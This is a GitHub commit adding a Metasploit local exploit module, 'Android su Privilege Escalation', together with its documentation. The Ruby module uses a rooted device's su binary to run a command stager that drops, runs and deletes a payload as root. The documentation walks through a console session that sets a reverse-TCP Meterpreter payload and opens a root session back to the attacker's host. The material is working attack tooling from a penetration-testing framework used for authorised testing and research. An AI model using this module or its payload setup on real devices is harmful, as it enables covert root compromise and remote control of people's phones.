Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #10012, Add an Android module to run payloads with su on a roote…
…d device
- Loading branch information
Showing
2 changed files
with
142 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
## Description | ||
|
||
This module uses the su binary present on rooted devices to run a payload as root. | ||
|
||
A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root. | ||
This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a | ||
temporary directory, make it executable, execute it in the background, and finally delete the executable. | ||
|
||
On most devices the su binary will pop-up a prompt on the device asking the user for permission. | ||
|
||
## Vulnerable Application | ||
|
||
This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data. | ||
Many devices can be rooted by flashing new firmware, however the existing data will be lost. | ||
|
||
## Verfication steps | ||
|
||
You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md) | ||
|
||
Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler. | ||
An example session follows: | ||
|
||
``` | ||
msf5 exploit(multi/handler) > sessions | ||
Active sessions | ||
=============== | ||
Id Name Type Information Connection | ||
-- ---- ---- ----------- ---------- | ||
1 meterpreter dalvik/android u0_a80 @ localhost 192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107) | ||
msf5 exploit(multi/handler) > use exploit/android/local/su_exec | ||
msf5 exploit(android/local/su_exec) > set SESSION 1 | ||
SESSION => 1 | ||
msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp | ||
payload => linux/aarch64/meterpreter/reverse_tcp | ||
msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176 | ||
LHOST => 192.168.0.176 | ||
msf5 exploit(android/local/su_exec) > set LPORT 4445 | ||
LPORT => 4445 | ||
msf5 exploit(android/local/su_exec) > run | ||
[!] SESSION may not be compatible with this module. | ||
[*] Started reverse TCP handler on 192.168.0.176:4445 | ||
[*] Transmitting intermediate midstager...(256 bytes) | ||
[*] Sending stage (818780 bytes) to 192.168.0.107 | ||
[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800 | ||
[-] Exploit failed: Rex::TimeoutError Operation timed out. | ||
[*] Exploit completed, but no session was created. | ||
``` | ||
|
||
Please not that in most cases you will have to manually confirm the Superuser prompt | ||
on the device itself before the module completes. You can do `set WfsDelay 10` to | ||
give yourself more time. | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,85 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Local | ||
Rank = ManualRanking | ||
|
||
include Msf::Exploit::CmdStager | ||
include Msf::Post::File | ||
include Msf::Post::Android::Priv | ||
|
||
def initialize(info={}) | ||
super( update_info( info, { | ||
'Name' => "Android 'su' Privilege Escalation", | ||
'Description' => %q{ | ||
This module uses the su binary present on rooted devices to run | ||
a payload as root. | ||
A rooted Android device will contain a su binary (often linked with | ||
an application) that allows the user to run commands as root. | ||
This module will use the su binary to execute a command stager | ||
as root. The command stager will write a payload binary to a | ||
temporary directory, make it executable, execute it in the background, | ||
and finally delete the executable. | ||
On most devices the su binary will pop-up a prompt on the device | ||
asking the user for permission. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'DisclosureDate' => 'Aug 31 2017', | ||
'SessionTypes' => [ 'meterpreter', 'shell' ], | ||
'Platform' => [ 'android', 'linux' ], | ||
'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ], | ||
'Targets' => [ | ||
['aarch64',{'Arch' => ARCH_AARCH64}], | ||
['armle', {'Arch' => ARCH_ARMLE}], | ||
['x86', {'Arch' => ARCH_X86}], | ||
['x64', {'Arch' => ARCH_X64}], | ||
['mipsle', {'Arch' => ARCH_MIPSLE}] | ||
], | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp', | ||
'WfsDelay' => 5, | ||
}, | ||
'DefaultTarget' => 0, | ||
} | ||
)) | ||
register_options([ | ||
OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']), | ||
OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']), | ||
]) | ||
end | ||
|
||
def base_dir | ||
datastore['WritableDir'].to_s | ||
end | ||
|
||
def su_bin | ||
datastore['SU_BINARY'].to_s | ||
end | ||
|
||
def exploit | ||
if is_root? | ||
fail_with Failure::BadConfig, 'Session already has root privileges' | ||
end | ||
|
||
linemax = 4088 - su_bin.size | ||
execute_cmdstager({ | ||
flavor: :echo, | ||
enc_format: :octal, | ||
prefix: '\\\\0', | ||
temp: base_dir, | ||
linemax: linemax, | ||
background: true, | ||
}) | ||
end | ||
|
||
def execute_command(cmd, opts) | ||
su_cmd = "#{su_bin} -c '#{cmd}'" | ||
cmd_exec(su_cmd) | ||
end | ||
|
||
end | ||
|